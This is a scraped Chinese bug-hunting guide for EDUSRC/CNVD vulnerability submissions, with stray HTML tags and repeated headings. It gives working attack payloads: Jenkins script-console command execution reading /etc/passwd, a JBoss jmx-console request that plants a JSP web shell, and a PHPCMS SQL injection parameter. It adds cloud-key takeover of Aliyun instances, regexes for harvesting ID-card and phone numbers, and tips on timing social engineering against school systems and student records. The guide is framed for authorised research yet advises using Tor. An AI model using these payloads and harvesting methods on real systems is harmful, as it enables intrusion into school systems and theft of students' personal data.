EDUSRC\/CNVD漏洞挖掘技巧详解<\/h1>

一、未授权访问漏洞挖掘<\/h2>

1. Jenkins未授权命令执行<\/h3>

漏洞路径：\/script<\/code><\/li>

利用方式：
println 'cat \/etc\/passwd'<\/span>.<\/span>execute<\/span>().<\/span>text<\/span>
<\/span><\/span>println "whoami"<\/span>.<\/span>execute<\/span>().<\/span>text<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
2. JBoss未授权漏洞<\/h3>

漏洞路径：\/jmx-console\/<\/code><\/li>
利用方式：
http:\/\/XXXX.com:8083\/jmx-console\/\/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=August.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True
<\/code><\/pre>
<\/li>
<\/ul>
3. 302跳转未授权<\/h3>

检测方法：

访问目标URL时观察到短暂进入后台后跳转登录页<\/li>
使用Burp抓包，Drop掉302跳转包<\/li>
检查是否仍可访问后台功能<\/li>
<\/ol>
<\/li>
<\/ul>
二、安全威胁情报挖掘<\/h2>
1. 备案信息异常<\/h3>

类型一：工信部备案存在但网站已被其他内容接管<\/li>
类型二：官方公众号发布已失效URL（备案已注销）<\/li>
<\/ul>
三、SQL注入漏洞挖掘<\/h2>
1. 通用SQL注入点<\/h3>

典型URL格式：\/xxxxx.php?c=xxxx&a=xxxx&xxxxid=<\/code><\/li>
挖掘方法：

发现一处SQL注入<\/li>
收集该公司开发的所有框架资产<\/li>
在所有域名上拼接已知存在SQL注入的URL路径<\/li>
<\/ol>
<\/li>
<\/ul>
2. PHPCMS v9魔改版注入<\/h3>

原始URL：http:\/\/www.xxxxx.cn\/index.php?m=content&c=index&a=lists&catid=193<\/code><\/li>
注入方法：添加&id=888%27<\/code>参数<\/li>
原理：官方版本lists方法不接受id参数，魔改版本错误拼接导致注入<\/li>
<\/ul>
四、目录遍历与信息泄露<\/h2>
1. 敏感文件类型<\/h3>

.key<\/code>：密钥文件<\/li>
.xls<\/code>：人员名单等数据<\/li>
.docx<\/code>：合同或打印模板<\/li>
.sql<\/code>：数据库导出文件<\/li>
.ibd<\/code>：InnoDB表空间文件（二进制格式）<\/li>
.MYD<\/code>：MyISAM表数据文件<\/li>
<\/ul>
2. 信息检索技巧<\/h3>

使用正则表达式搜索敏感信息：

身份证号：\d{17}[\dXx]<\/code><\/li>
手机号：1[3-9]\d{9}<\/code><\/li>
<\/ul>
<\/li>
<\/ul>
3. APK文件分析<\/h3>

工具链：

apkleaks<\/code>：解包\/反编译并扫描敏感信息<\/li>
jadx<\/code>：将DEX字节码转换为Java源代码<\/li>
GDA4.11<\/code>：APK分析工具<\/li>
<\/ul>
<\/li>
分析重点：

密钥泄露<\/li>
未授权接口<\/li>
弱加密\/签名算法<\/li>
敏感文件\/目录访问<\/li>
逻辑漏洞<\/li>
<\/ul>
<\/li>
<\/ul>
五、红队社工技巧<\/h2>
1. 高价值系统判断标准<\/h3>

重要业务系统<\/li>
信息量大的系统（如学生档案、财务数据等）<\/li>
<\/ul>
2. 教育系统重点关注时段<\/h3>

学生实习、毕业季<\/li>
招生迎新季<\/li>
请假、奖学金申请时段<\/li>
<\/ul>
六、弱口令漏洞挖掘<\/h2>
1. 常见框架指纹<\/h3>

绿若依：web.icon=="4eeb8a8eb30b70af511dcc28c11a3216"<\/code><\/li>
黑若依：web.icon=="eeed0dd225e44a5fe7b5f31fea185b61"<\/code><\/li>
蓝若依：web.icon=="e49fd30ea870c7a820464ca56a113e6e"<\/code><\/li>
<\/ul>
2. 若依框架未授权访问<\/h3>

路径拼接尝试：

\/monitor\/job<\/code>（定时任务）<\/li>
<\/ul>
<\/li>
大屏数据泄露：

学号可能包含身份证信息（去除前缀后）<\/li>
<\/ul>
<\/li>
<\/ul>
3. 内网系统端口映射漏洞<\/h3>

识别特征：微步标记为VPN\/代理<\/li>
漏洞原理：

内网系统通过端口映射暴露到公网<\/li>
多个系统共享同一认证域名\/SSO<\/li>
Session\/Cookie可跨系统滥用<\/li>
<\/ol>
<\/li>
利用方法：

登录一个系统<\/li>
不退出情况下访问同IP其他系统<\/li>
检查是否自动登录<\/li>
<\/ol>
<\/li>
<\/ul>
4. 云存储配置泄露<\/h3>

常见泄露点：

文件管理配置中包含桶URL和Key<\/li>
MinIO未授权访问（返回<ListBucketResult><\/code>XML）<\/li>
<\/ul>
<\/li>
验证方法：直接拼接URL访问<\/li>
云服务Key利用：

阿里云Key可接管实例<\/li>
通过行云管家等工具管理实例<\/li>
<\/ul>
<\/li>
<\/ul>
七、安全测试注意事项<\/h2>

使用虚拟机武器库+无痕窗口+Tor<\/li>
测试前创建快照，测试后回滚<\/li>
避免输入真实账号密码和个人敏感信息<\/li>
仅用于合法授权环境下的安全研究<\/li>
所有测试行为应遵循法律法规<\/li>
<\/ol>

EDUSRC\/CNVD漏洞挖掘技巧详解<\/h1>

一、未授权访问漏洞挖掘<\/h2>

二、安全威胁情报挖掘<\/h2>

三、SQL注入漏洞挖掘<\/h2>

四、目录遍历与信息泄露<\/h2>

五、红队社工技巧<\/h2>

六、弱口令漏洞挖掘<\/h2>

七、安全测试注意事项<\/h2> 使用虚拟机武器库+无痕窗口+Tor<\/li> 测试前创建快照，测试后回滚<\/li> 避免输入真实账号密码和个人敏感信息<\/li> 仅用于合法授权环境下的安全研究<\/li> 所有测试行为应遵循法律法规<\/li> <\/ol>

七、安全测试注意事项<\/h2>

使用虚拟机武器库+无痕窗口+Tor<\/li>
测试前创建快照，测试后回滚<\/li>
避免输入真实账号密码和个人敏感信息<\/li>
仅用于合法授权环境下的安全研究<\/li>
所有测试行为应遵循法律法规<\/li> <\/ol>